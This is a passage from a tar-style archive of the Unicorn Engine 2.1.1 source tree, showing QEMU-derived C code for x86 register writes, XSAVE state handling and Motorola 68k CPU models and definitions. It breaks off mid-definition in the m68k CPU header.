CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[15], *(uint16_t *)value); break; case UC_X86_REG_R15B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[15], *(uint8_t *)value); break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); env->idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->idt.base = ((uc_x86_mmr *)value)->base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); env->gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->gdt.base = ((uc_x86_mmr *)value)->base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); env->ldt.limit = ((uc_x86_mmr *)value)->limit; env->ldt.base = ((uc_x86_mmr *)value)->base; env->ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->ldt.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); env->tr.limit = ((uc_x86_mmr *)value)->limit; env->tr.base = ((uc_x86_mmr *)value)->base; env->tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->tr.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_write(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); cpu_set_mxcsr(env, *(uint32_t *)value); break; case UC_X86_REG_XMM8: case UC_X86_REG_XMM9: case UC_X86_REG_XMM10: case UC_X86_REG_XMM11: case UC_X86_REG_XMM12: case UC_X86_REG_XMM13: case UC_X86_REG_XMM14: case UC_X86_REG_XMM15: { CHECK_REG_TYPE(float64[2]); float64 *src = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; reg->ZMM_Q(0) = src[0]; reg->ZMM_Q(1) = src[1]; break; } case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint64_t); env->segs[R_FS].base = *(uint64_t *)value; return 0; case UC_X86_REG_GS_BASE: CHECK_REG_TYPE(uint64_t); env->segs[R_GS].base = *(uint64_t *)value; return 0; } break; #endif } return ret; } static bool x86_stop_interrupt(struct uc_struct *uc, int intno) { switch (intno) { default: return false; case EXCP06_ILLOP: return true; } } static bool x86_insn_hook_validate(uint32_t insn_enum) { // for x86 we can only hook IN, OUT, and SYSCALL if (insn_enum != UC_X86_INS_IN && insn_enum != UC_X86_INS_OUT && insn_enum != UC_X86_INS_SYSCALL && insn_enum != UC_X86_INS_SYSENTER && insn_enum != UC_X86_INS_CPUID) { return false; } return true; } static bool x86_opcode_hook_invalidate(uint32_t op, uint32_t flags) { if (op != UC_TCG_OP_SUB) { return false; } switch (op) { case UC_TCG_OP_SUB: if ((flags & UC_TCG_OP_FLAG_CMP) && (flags & UC_TCG_OP_FLAG_DIRECT)) { return false; } break; default: return false; } return true; } static int x86_cpus_init(struct uc_struct *uc, const char *cpu_model) { X86CPU *cpu; cpu = cpu_x86_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = x86_release; uc->set_pc = x86_set_pc; uc->get_pc = x86_get_pc; uc->stop_interrupt = x86_stop_interrupt; uc->insn_hook_validate = x86_insn_hook_validate; uc->opcode_hook_invalidate = x86_opcode_hook_invalidate; uc->cpus_init = x86_cpus_init; uc->cpu_context_size = offsetof(CPUX86State, retaddr); uc_common_init(uc); } /* vim: set ts=4 sts=4 sw=4 et: */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/unicorn.h������������������������������������������������������������0000664�0000000�0000000�00000001061�14675241067�0017756�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_QEMU_TARGET_I386_H #define UC_QEMU_TARGET_I386_H // functions to read & write registers uc_err reg_read_x86_64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_x86_64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_x86_64(struct uc_struct *uc); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/xsave_helper.c�������������������������������������������������������0000664�0000000�0000000�00000007257�14675241067�0020776�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "cpu.h" void x86_cpu_xsave_all_areas(X86CPU *cpu, X86XSaveArea *buf) { CPUX86State *env = &cpu->env; X86XSaveArea *xsave = buf; uint16_t cwd, swd, twd; int i; memset(xsave, 0, sizeof(X86XSaveArea)); twd = 0; swd = env->fpus & ~(7 << 11); swd |= (env->fpstt & 7) << 11; cwd = env->fpuc; for (i = 0; i < 8; ++i) { twd |= (!env->fptags[i]) << i; } xsave->legacy.fcw = cwd; xsave->legacy.fsw = swd; xsave->legacy.ftw = twd; xsave->legacy.fpop = env->fpop; xsave->legacy.fpip = env->fpip; xsave->legacy.fpdp = env->fpdp; memcpy(&xsave->legacy.fpregs, env->fpregs, sizeof env->fpregs); xsave->legacy.mxcsr = env->mxcsr; xsave->header.xstate_bv = env->xstate_bv; memcpy(&xsave->bndreg_state.bnd_regs, env->bnd_regs, sizeof env->bnd_regs); xsave->bndcsr_state.bndcsr = env->bndcs_regs; memcpy(&xsave->opmask_state.opmask_regs, env->opmask_regs, sizeof env->opmask_regs); for (i = 0; i < CPU_NB_REGS; i++) { uint8_t *xmm = xsave->legacy.xmm_regs[i]; uint8_t *ymmh = xsave->avx_state.ymmh[i]; uint8_t *zmmh = xsave->zmm_hi256_state.zmm_hi256[i]; stq_p(xmm, env->xmm_regs[i].ZMM_Q(0)); stq_p(xmm+8, env->xmm_regs[i].ZMM_Q(1)); stq_p(ymmh, env->xmm_regs[i].ZMM_Q(2)); stq_p(ymmh+8, env->xmm_regs[i].ZMM_Q(3)); stq_p(zmmh, env->xmm_regs[i].ZMM_Q(4)); stq_p(zmmh+8, env->xmm_regs[i].ZMM_Q(5)); stq_p(zmmh+16, env->xmm_regs[i].ZMM_Q(6)); stq_p(zmmh+24, env->xmm_regs[i].ZMM_Q(7)); } #ifdef TARGET_X86_64 memcpy(&xsave->hi16_zmm_state.hi16_zmm, &env->xmm_regs[16], 16 * sizeof env->xmm_regs[16]); memcpy(&xsave->pkru_state, &env->pkru, sizeof env->pkru); #endif } void x86_cpu_xrstor_all_areas(X86CPU *cpu, const X86XSaveArea *buf) { CPUX86State *env = &cpu->env; const X86XSaveArea *xsave = buf; int i; uint16_t cwd, swd, twd; cwd = xsave->legacy.fcw; swd = xsave->legacy.fsw; twd = xsave->legacy.ftw; env->fpop = xsave->legacy.fpop; env->fpstt = (swd >> 11) & 7; env->fpus = swd; env->fpuc = cwd; for (i = 0; i < 8; ++i) { env->fptags[i] = !((twd >> i) & 1); } env->fpip = xsave->legacy.fpip; env->fpdp = xsave->legacy.fpdp; env->mxcsr = xsave->legacy.mxcsr; memcpy(env->fpregs, &xsave->legacy.fpregs, sizeof env->fpregs); env->xstate_bv = xsave->header.xstate_bv; memcpy(env->bnd_regs, &xsave->bndreg_state.bnd_regs, sizeof env->bnd_regs); env->bndcs_regs = xsave->bndcsr_state.bndcsr; memcpy(env->opmask_regs, &xsave->opmask_state.opmask_regs, sizeof env->opmask_regs); for (i = 0; i < CPU_NB_REGS; i++) { const uint8_t *xmm = xsave->legacy.xmm_regs[i]; const uint8_t *ymmh = xsave->avx_state.ymmh[i]; const uint8_t *zmmh = xsave->zmm_hi256_state.zmm_hi256[i]; env->xmm_regs[i].ZMM_Q(0) = ldq_p(xmm); env->xmm_regs[i].ZMM_Q(1) = ldq_p(xmm+8); env->xmm_regs[i].ZMM_Q(2) = ldq_p(ymmh); env->xmm_regs[i].ZMM_Q(3) = ldq_p(ymmh+8); env->xmm_regs[i].ZMM_Q(4) = ldq_p(zmmh); env->xmm_regs[i].ZMM_Q(5) = ldq_p(zmmh+8); env->xmm_regs[i].ZMM_Q(6) = ldq_p(zmmh+16); env->xmm_regs[i].ZMM_Q(7) = ldq_p(zmmh+24); } #ifdef TARGET_X86_64 memcpy(&env->xmm_regs[16], &xsave->hi16_zmm_state.hi16_zmm, 16 * sizeof env->xmm_regs[16]); memcpy(&env->pkru, &xsave->pkru_state, sizeof env->pkru); #endif } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016226�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/cpu-param.h����������������������������������������������������������0000664�0000000�0000000�00000000663�14675241067�0020271�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * m68k cpu parameters for qemu. * * Copyright (c) 2005-2007 CodeSourcery * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef M68K_CPU_PARAM_H #define M68K_CPU_PARAM_H 1 #define TARGET_LONG_BITS 32 /* * Coldfire Linux uses 8k pages * and m68k linux uses 4k pages * use the smallest one */ #define TARGET_PAGE_BITS 12 #define TARGET_PHYS_ADDR_SPACE_BITS 32 #define TARGET_VIRT_ADDR_SPACE_BITS 32 #define NB_MMU_MODES 2 #endif �����������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/cpu-qom.h������������������������������������������������������������0000664�0000000�0000000�00000002516�14675241067�0017764�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Motorola 68k CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_M68K_CPU_QOM_H #define QEMU_M68K_CPU_QOM_H #include "hw/core/cpu.h" #define M68K_CPU(obj) ((M68kCPU *)obj) #define M68K_CPU_CLASS(klass) ((M68kCPUClass *)klass) #define M68K_CPU_GET_CLASS(obj) (&((M68kCPU *)obj)->cc) /* * M68kCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A Motorola 68k CPU model. */ typedef struct M68kCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } M68kCPUClass; typedef struct M68kCPU M68kCPU; #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/cpu.c����������������������������������������������������������������0000664�0000000�0000000�00000020553�14675241067�0017166�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Motorola 68k CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #include "qemu/osdep.h" #include "cpu.h" #include "fpu/softfloat.h" #include "exec/exec-all.h" static void m68k_cpu_set_pc(CPUState *cs, vaddr value) { M68kCPU *cpu = M68K_CPU(cs); cpu->env.pc = value; } static bool m68k_cpu_has_work(CPUState *cs) { return cs->interrupt_request & CPU_INTERRUPT_HARD; } static void m68k_set_feature(CPUM68KState *env, int feature) { env->features |= (1u << feature); } static void m68k_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); M68kCPU *cpu = M68K_CPU(s); M68kCPUClass *mcc = M68K_CPU_GET_CLASS(cpu); CPUM68KState *env = &cpu->env; floatx80 nan = floatx80_default_nan(NULL); int i; mcc->parent_reset(dev); memset(env, 0, offsetof(CPUM68KState, end_reset_fields)); cpu_m68k_set_sr(env, SR_S | SR_I); for (i = 0; i < 8; i++) { env->fregs[i].d = nan; } cpu_m68k_set_fpcr(env, 0); env->fpsr = 0; /* TODO: We should set PC from the interrupt vector. */ env->pc = 0; } /* CPU models */ static void m5206_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); } static void m68000_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_M68000); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); m68k_set_feature(env, M68K_FEATURE_MOVEP); } /* common features for 68020, 68030 and 68040 */ static void m680x0_cpu_common(CPUM68KState *env) { m68k_set_feature(env, M68K_FEATURE_M68000); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); m68k_set_feature(env, M68K_FEATURE_QUAD_MULDIV); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_BCCL); m68k_set_feature(env, M68K_FEATURE_BITFIELD); m68k_set_feature(env, M68K_FEATURE_EXT_FULL); m68k_set_feature(env, M68K_FEATURE_SCALED_INDEX); m68k_set_feature(env, M68K_FEATURE_LONG_MULDIV); m68k_set_feature(env, M68K_FEATURE_FPU); m68k_set_feature(env, M68K_FEATURE_CAS); m68k_set_feature(env, M68K_FEATURE_BKPT); m68k_set_feature(env, M68K_FEATURE_RTD); m68k_set_feature(env, M68K_FEATURE_CHK2); m68k_set_feature(env, M68K_FEATURE_MOVEP); } static void m68020_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m680x0_cpu_common(env); m68k_set_feature(env, M68K_FEATURE_M68020); } static void m68030_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m680x0_cpu_common(env); m68k_set_feature(env, M68K_FEATURE_M68030); } static void m68040_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m680x0_cpu_common(env); m68k_set_feature(env, M68K_FEATURE_M68040); } static void m68060_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_M68000); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_BCCL); m68k_set_feature(env, M68K_FEATURE_BITFIELD); m68k_set_feature(env, M68K_FEATURE_EXT_FULL); m68k_set_feature(env, M68K_FEATURE_SCALED_INDEX); m68k_set_feature(env, M68K_FEATURE_LONG_MULDIV); m68k_set_feature(env, M68K_FEATURE_FPU); m68k_set_feature(env, M68K_FEATURE_CAS); m68k_set_feature(env, M68K_FEATURE_BKPT); m68k_set_feature(env, M68K_FEATURE_RTD); m68k_set_feature(env, M68K_FEATURE_CHK2); m68k_set_feature(env, M68K_FEATURE_M68060); } static void m5208_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_CF_EMAC); m68k_set_feature(env, M68K_FEATURE_USP); } static void cfv4e_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_CF_FPU); m68k_set_feature(env, M68K_FEATURE_CF_EMAC); m68k_set_feature(env, M68K_FEATURE_USP); } static void any_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_CF_FPU); /* * MAC and EMAC are mututally exclusive, so pick EMAC. * It's mostly backwards compatible. */ m68k_set_feature(env, M68K_FEATURE_CF_EMAC); m68k_set_feature(env, M68K_FEATURE_CF_EMAC_B); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_EXT_FULL); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); } static void m68k_cpu_realizefn(CPUState *dev) { CPUState *cs = CPU(dev); M68kCPU *cpu = M68K_CPU(dev); register_m68k_insns(&cpu->env); cpu_exec_realizefn(cs); } static void m68k_cpu_initfn(struct uc_struct *uc, CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void m68k_cpu_class_init(CPUClass *c) { M68kCPUClass *mcc = M68K_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ mcc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: x86_cpu_reset(). */ cc->reset = m68k_cpu_reset; cc->has_work = m68k_cpu_has_work; cc->do_interrupt = m68k_cpu_do_interrupt; cc->cpu_exec_interrupt = m68k_cpu_exec_interrupt; cc->set_pc = m68k_cpu_set_pc; cc->tlb_fill_cpu = m68k_cpu_tlb_fill; cc->get_phys_page_debug = m68k_cpu_get_phys_page_debug; cc->tcg_initialize = m68k_tcg_init; } #define DEFINE_M68K_CPU_TYPE(cpu_model, initfn) \ { \ .name = cpu_model, \ .initfn = initfn, \ } struct M68kCPUInfo { const char *name; void (*initfn)(CPUState *obj); }; static struct M68kCPUInfo m68k_cpus_type_infos[] = { { "m68000", m68000_cpu_initfn }, { "m68020", m68020_cpu_initfn }, { "m68030", m68030_cpu_initfn }, { "m68040", m68040_cpu_initfn }, { "m68060", m68060_cpu_initfn }, { "m5206", m5206_cpu_initfn }, { "m5208", m5208_cpu_initfn }, { "cfv4e", cfv4e_cpu_initfn }, { "any", any_cpu_initfn }, }; M68kCPU *cpu_m68k_init(struct uc_struct *uc) { M68kCPU *cpu; CPUState *cs; CPUClass *cc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_M68K_CFV4E; // cfv4e } else if (uc->cpu_model >= ARRAY_SIZE(m68k_cpus_type_infos)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; cpu_class_init(uc, cc); m68k_cpu_class_init(cc); cpu_common_initfn(uc, cs); m68k_cpu_initfn(uc, cs); m68k_cpus_type_infos[uc->cpu_model].initfn(cs); m68k_cpu_realizefn(cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; } �����������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/cpu.h����������������������������������������������������������������0000664�0000000�0000000�00000042014�14675241067�0017167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * m68k virtual CPU header * * Copyright (c) 2005-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef M68K_CPU_H #define M68K_CPU_H #include "exec/cpu-defs.h" #include "cpu-qom.h" #define OS_BYTE 0 #define OS_WORD 1 #define OS_LONG 2 #define OS_SINGLE 3 #define OS_DOUBLE 4 #define OS_EXTENDED 5 #define OS_PACKED 6 #define OS_UNSIZED 7 #define MAX_QREGS 32 #define EXCP_ACCESS 2 /* Access (MMU) error. */ #define EXCP_ADDRESS 3 /* Address error. */ #define EXCP_ILLEGAL 4 /* Illegal instruction. */ #define EXCP_DIV0 5 /* Divide by zero */ #define EXCP_CHK 6 /* CHK, CHK2 Instructions */ #define EXCP_TRAPCC 7 /* FTRAPcc, TRAPcc, TRAPV Instructions */ #define EXCP_PRIVILEGE 8 /* Privilege violation. */ #define EXCP_TRACE 9 #define EXCP_LINEA 10 /* Unimplemented line-A (MAC) opcode. */ #define EXCP_LINEF 11 /* Unimplemented line-F (FPU) opcode. */ #define EXCP_DEBUGNBP 12 /* Non-breakpoint debug interrupt. */ #define EXCP_DEBEGBP 13 /* Breakpoint debug interrupt. */ #define EXCP_FORMAT 14 /* RTE format error. */ #define EXCP_UNINITIALIZED 15 #define EXCP_SPURIOUS 24 /* Spurious interrupt */ #define EXCP_INT_LEVEL_1 25 /* Level 1 Interrupt autovector */ #define EXCP_INT_LEVEL_7 31 /* Level 7 Interrupt autovector */ #define EXCP_TRAP0 32 /* User trap #0. */ #define EXCP_TRAP15 47 /* User trap #15. */ #define EXCP_FP_BSUN 48 /* Branch Set on Unordered */ #define EXCP_FP_INEX 49 /* Inexact result */ #define EXCP_FP_DZ 50 /* Divide by Zero */ #define EXCP_FP_UNFL 51 /* Underflow */ #define EXCP_FP_OPERR 52 /* Operand Error */ #define EXCP_FP_OVFL 53 /* Overflow */ #define EXCP_FP_SNAN 54 /* Signaling Not-A-Number */ #define EXCP_FP_UNIMP 55 /* Unimplemented Data type */ #define EXCP_MMU_CONF 56 /* MMU Configuration Error */ #define EXCP_MMU_ILLEGAL 57 /* MMU Illegal Operation Error */ #define EXCP_MMU_ACCESS 58 /* MMU Access Level Violation Error */ #define EXCP_RTE 0x100 #define EXCP_HALT_INSN 0x101 #define M68K_DTTR0 0 #define M68K_DTTR1 1 #define M68K_ITTR0 2 #define M68K_ITTR1 3 #define M68K_MAX_TTR 2 #define TTR(type, index) ttr[((type & ACCESS_CODE) == ACCESS_CODE) * 2 + index] #define TARGET_INSN_START_EXTRA_WORDS 1 typedef CPU_LDoubleU FPReg; typedef struct CPUM68KState { uint32_t dregs[8]; uint32_t aregs[8]; uint32_t pc; uint32_t sr; /* SSP and USP. The current_sp is stored in aregs[7], the other here. */ int current_sp; uint32_t sp[3]; /* Condition flags. */ uint32_t cc_op; uint32_t cc_x; /* always 0/1 */ uint32_t cc_n; /* in bit 31 (i.e. negative) */ uint32_t cc_v; /* in bit 31, unused, or computed from cc_n and cc_v */ uint32_t cc_c; /* either 0/1, unused, or computed from cc_n and cc_v */ uint32_t cc_z; /* == 0 or unused */ FPReg fregs[8]; FPReg fp_result; uint32_t fpcr; uint32_t fpsr; float_status fp_status; uint64_t mactmp; /* * EMAC Hardware deals with 48-bit values composed of one 32-bit and * two 8-bit parts. We store a single 64-bit value and * rearrange/extend this when changing modes. */ uint64_t macc[4]; uint32_t macsr; uint32_t mac_mask; /* MMU status. */ struct { uint32_t ar; uint32_t ssw; /* 68040 */ uint16_t tcr; uint32_t urp; uint32_t srp; bool fault; uint32_t ttr[4]; uint32_t mmusr; } mmu; /* Control registers. */ uint32_t vbr; uint32_t mbar; uint32_t rambar0; uint32_t cacr; uint32_t sfc; uint32_t dfc; int pending_vector; int pending_level; uint32_t qregs[MAX_QREGS]; /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; /* Fields from here on are preserved across CPU reset. */ uint32_t features; // Unicorn engine struct uc_struct *uc; } CPUM68KState; /* * M68kCPU: * @env: #CPUM68KState * * A Motorola 68k CPU. */ struct M68kCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUM68KState env; struct M68kCPUClass cc; }; void m68k_cpu_do_interrupt(CPUState *cpu); bool m68k_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr m68k_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void m68k_tcg_init(struct uc_struct *uc); /* * you can call this signal handler from your SIGBUS and SIGSEGV * signal handlers to inform the virtual CPU of exceptions. non zero * is returned if the signal was handled by the virtual CPU. */ int cpu_m68k_signal_handler(int host_signum, void *pinfo, void *puc); uint32_t cpu_m68k_get_ccr(CPUM68KState *env); void cpu_m68k_set_ccr(CPUM68KState *env, uint32_t); void cpu_m68k_set_sr(CPUM68KState *env, uint32_t); void cpu_m68k_set_fpcr(CPUM68KState *env, uint32_t val); /* * Instead of computing the condition codes after each m68k instruction, * QEMU just stores one operand (called CC_SRC), the result * (called CC_DEST) and the type of operation (called CC_OP). When the * condition codes are needed, the condition codes can be calculated * using this information. Condition codes are not generated if they * are only needed for conditional branches. */ typedef enum { /* Translator only -- use env->cc_op. */ CC_OP_DYNAMIC, /* Each flag bit computed into cc_[xcnvz]. */ CC_OP_FLAGS, /* X in cc_x, C = X, N in cc_n, Z in cc_n, V via cc_n/cc_v. */ CC_OP_ADDB, CC_OP_ADDW, CC_OP_ADDL, CC_OP_SUBB, CC_OP_SUBW, CC_OP_SUBL, /* X in cc_x, {N,Z,C,V} via cc_n/cc_v. */ CC_OP_CMPB, CC_OP_CMPW, CC_OP_CMPL, /* X in cc_x, C = 0, V = 0, N in cc_n, Z in cc_n. */ CC_OP_LOGIC, CC_OP_NB } CCOp; #define CCF_C 0x01 #define CCF_V 0x02 #define CCF_Z 0x04 #define CCF_N 0x08 #define CCF_X 0x10 #define SR_I_SHIFT 8 #define SR_I 0x0700 #define SR_M 0x1000 #define SR_S 0x2000 #define SR_T_SHIFT 14 #define SR_T 0xc000 #define M68K_SSP 0 #define M68K_USP 1 #define M68K_ISP 2 /* bits for 68040 special status word */ #define M68K_CP_040 0x8000 #define M68K_CU_040 0x4000 #define M68K_CT_040 0x2000 #define M68K_CM_040 0x1000 #define M68K_MA_040 0x0800 #define M68K_ATC_040 0x0400 #define M68K_LK_040 0x0200 #define M68K_RW_040 0x0100 #define M68K_SIZ_040 0x0060 #define M68K_TT_040 0x0018 #define M68K_TM_040 0x0007 #define M68K_TM_040_DATA 0x0001 #define M68K_TM_040_CODE 0x0002 #define M68K_TM_040_SUPER 0x0004 /* bits for 68040 write back status word */ #define M68K_WBV_040 0x80 #define M68K_WBSIZ_040 0x60 #define M68K_WBBYT_040 0x20 #define M68K_WBWRD_040 0x40 #define M68K_WBLNG_040 0x00 #define M68K_WBTT_040 0x18 #define M68K_WBTM_040 0x07 /* bus access size codes */ #define M68K_BA_SIZE_MASK 0x60 #define M68K_BA_SIZE_BYTE 0x20 #define M68K_BA_SIZE_WORD 0x40 #define M68K_BA_SIZE_LONG 0x00 #define M68K_BA_SIZE_LINE 0x60 /* bus access transfer type codes */ #define M68K_BA_TT_MOVE16 0x08 /* bits for 68040 MMU status register (mmusr) */ #define M68K_MMU_B_040 0x0800 #define M68K_MMU_G_040 0x0400 #define M68K_MMU_U1_040 0x0200 #define M68K_MMU_U0_040 0x0100 #define M68K_MMU_S_040 0x0080 #define M68K_MMU_CM_040 0x0060 #define M68K_MMU_M_040 0x0010 #define M68K_MMU_WP_040 0x0004 #define M68K_MMU_T_040 0x0002 #define M68K_MMU_R_040 0x0001 #define M68K_MMU_SR_MASK_040 (M68K_MMU_G_040 | M68K_MMU_U1_040 | \ M68K_MMU_U0_040 | M68K_MMU_S_040 | \ M68K_MMU_CM_040 | M68K_MMU_M_040 | \ M68K_MMU_WP_040) /* bits for 68040 MMU Translation Control Register */ #define M68K_TCR_ENABLED 0x8000 #define M68K_TCR_PAGE_8K 0x4000 /* bits for 68040 MMU Table Descriptor / Page Descriptor / TTR */ #define M68K_DESC_WRITEPROT 0x00000004 #define M68K_DESC_USED 0x00000008 #define M68K_DESC_MODIFIED 0x00000010 #define M68K_DESC_CACHEMODE 0x00000060 #define M68K_DESC_CM_WRTHRU 0x00000000 #define M68K_DESC_CM_COPYBK 0x00000020 #define M68K_DESC_CM_SERIAL 0x00000040 #define M68K_DESC_CM_NCACHE 0x00000060 #define 